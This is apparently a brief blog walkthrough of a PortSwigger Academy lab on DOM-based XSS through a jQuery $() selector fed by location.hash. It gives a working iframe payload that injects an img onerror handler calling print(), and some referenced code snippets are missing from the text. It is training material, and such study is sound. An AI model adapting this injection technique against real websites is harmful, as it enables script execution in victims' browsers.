BurpSuite Lab – DOM XSS in jQuery selector sink using a hashchange event

This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery’s $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.

To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.

The affected code is:

Go to the exploit server:

Add into the body the malicious iframe:

<iframe src="https://0a2e00cb036dbde4c0785e5d005a000a.web-security-academy.net/#" onload="this.src+='<img src=1 onerror=print()>'"></iframe>

Based on the documentation found in the PortSwigger Academy from DOM-based XSS:

Store it, deliver to the victim and go back to the lab to solve it.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *